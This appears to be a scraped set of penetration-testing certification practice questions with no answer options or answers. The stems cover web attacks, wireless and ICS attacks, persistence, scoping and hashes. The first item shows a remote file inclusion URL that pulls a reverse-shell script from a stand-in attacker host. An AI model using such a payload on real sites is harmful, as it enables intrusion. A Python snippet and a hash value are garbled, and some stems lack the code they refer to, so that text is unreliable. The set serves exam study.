While monitoring WAF logs, a security analyst discovers a successful attack against the following URL:
https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php
Which of the following remediation steps should be taken to prevent this type of attack?
Which of the following tools is used to perform a credential brute force attack?
An organization has requested that a penetration test be performed to determine if it is possible for an attacker to gain a foothold on the organization's server segment During the assessment, the penetration tester identifies tools that appear to have been left behind by a prior attack Which of the following actions should the penetration tester take?
A penetration tester is required to exploit a WPS implementation weakness. Which of the following tools will perform the attack?
A penetration tester has obtained access to an IP network subnet that contains ICS equipment intercommunication. Which of the following attacks is MOST likely to succeed in creating a physical effect?
Performance based
You are a penetration Inter reviewing a client's website through a web browser.
Instructions:
Review all components of the website through the browser to determine if vulnerabilities are present.
Remediate ONLY the highest vulnerability from either the certificate source or cookies.
A penetration testing company was hired to conduct a penetration test against Company A's network of 20.10.10.0/24 and mail.companyA.com. While the penetration testing company was in the information gathering phase, it was discovered that the mail.companyA.com IP address resolved to 20.15.1.2 and belonged to Company B. Which of the following would be the BEST solution to conduct penetration testing against mail.companyA.com?
An Internet-accessible database server was found with the following ports open: 22, 53, 110, 1433, and 3389. Which of the following would be the BEST hardening technique to secure the server?
A client is asking a penetration tester to evaluate a new web application for availability. Which of the following types of attacks should the tester use?
After establishing a shell on a target system, Joe, a penetration tester is aware that his actions have not been detected. He now wants to maintain persistent access to the machine. Which of the following methods would be MOST easily detected?
Which of the following wordlists is BEST for cracking MD5 password hashes of an application's users from a compromised database?
Defining exactly what is to be tested and the results to be generated from the test will help prevent?
A client has scheduled a wireless penetration test. Which of the following describes the scoping target
information MOST likely needed before testing can begin?
A penetration tester wants to target NETBIOS name service. Which of the following is the most likely command to exploit the NETBIOS name service?
A penetration tester wants to check manually if a “ghost” vulnerability exists in a system. Which of the following methods is the correct way to validate the vulnerability?
An individual has been hired by an organization after passing a background check. The individual has been
passing information to a competitor over a period of time. Which of the following classifications BEST
describes the individual?
A penetration tester is preparing to conduct API testing Which of the following would be MOST helpful in preparing for this engagement?
A vulnerability scan report shows what appears to be evidence of a memory disclosure vulnerability on one of
the target hosts. The administrator claims the system is patched and the evidence is a false positive. Which of
the following is the BEST method for a tester to confirm the vulnerability exists?
A penetration tester is performing a black box assessment on a web-based banking application. The tester was only provided with a URL to the login page. Give the below code and output
Import requests
from BeautifulSoup import BeautifulSoup
request = requests.get (“https://www.bank.com/admin ”)
respHeaders, respBody = request[0]. Request[1]
if respHeader.statuscode == 200:
soup = BeautifulSoup (respBody)
soup = soup.FindAll (“div”, (“type” : “hidden”))
print respHeader. StatusCode, StatusMessage
else:
print respHeader. StatusCode, StatusMessage
Output: 200 OK
Which of the following is the tester intending to do?
Which of the following should a penetration tester verify prior to testing the login and permissions management for a web application that is protected by a CDN-based WAF?
Which of the following BEST describes some significant security weaknesses with an ICS, such as those used
in electrical utility facilities, natural gas facilities, dams, and nuclear facilities?
Consumer-based IoT devices are often less secure than systems built for traditional desktop computers.
Which of the following BEST describes the reasoning for this?
Which of the following BEST protects against a rainbow table attack?
D18912E1457D5D1DDCBD40AB3BF70D5D
During a penetration test, a host is discovered that appears to have been previously compromised and has an active outbound connection. After verifying the network activity is malicious, which of the following should the tester do?
A penetration tester used an ASP.NET web shell to gain access to a web application, which allowed the tester
to pivot in the corporate network. Which of the following is the MOST important follow-up activity to complete
after the tester delivers the report?
A penetration tester is preparing for an assessment of a web server's security, which is used to host several sensitive web applications. The web server is PKI protected, and the penetration tester reviews the certificate presented by the server during the SSL handshake. Which of the following certificate fields or extensions would be of MOST use to the penetration tester during an assessment?
A penetration tester locates a few unquoted service paths during an engagement. Which of the following can the tester attempt to do with these?
A manager calls upon a tester to assist with diagnosing an issue within the following Python script:
#!/usr/bin/python
s = “Administrator”
The tester suspects it is an issue with string slicing and manipulation Analyze the following code segment and drag and drop the correct output for each string manipulation to its corresponding code segment Options may be used once or not at all
When performing active information reconnaissance, which of the following should be tested FIRST before starting the exploitation process?
A penetration tester has been assigned to perform an external penetration assessment of a company. Which of the following steps would BEST help with the passive-information-gathering process? (Choose two.)
A malicious user wants to perform an MITM attack on a computer. The computer network configuration is given below:
IP: 192.168.1.20
NETMASK: 255.255.255.0
DEFAULT GATEWAY: 192.168.1.254
DHCP: 192.168.1.253
DNS: 192.168.10.10, 192.168.20.10
Which of the following commands should the malicious user execute to perform the MITM attack?
Which of the following tools would a penetration tester leverage to conduct OSINT? (Select TWO).
While presenting the results of a penetration test to a client's executive team, the Chief Information Security Officer (CISO) asks for remediation advice for a shared local administrator finding. The client is geographically dispersed, and centralized management is a key concern. Which of the following is the BEST remediation to suggest?
A penetration tester is performing a code review against a web application Given the following URL and source code:
Which of the following vulnerabilities is present in the code above?
Which of the following documents BEST describes the manner in which a security assessment will be conducted?
Which of the following are MOST important when planning for an engagement? (Select TWO).
A company planned for and secured the budget to hire a consultant to perform a web application penetration test. Upon discovering vulnerabilities, the company asked the consultant to perform the following tasks:
Which of the following has occurred in this situation?
If a security consultant comes across a password hash that resembles the following
b117 525b3454 7Oc29ca3dBaeOb556ba8
Which of the following formats is the correct hash type?
Given the following HTTP response:
http/1.0 200 OK
Server: Apache
Set-Cookie: AUTHID=879DHUT74D9A7C; http-only
Content-type: text/html
Connection: Close
Which of the following aspects of an XSS attack would be prevented?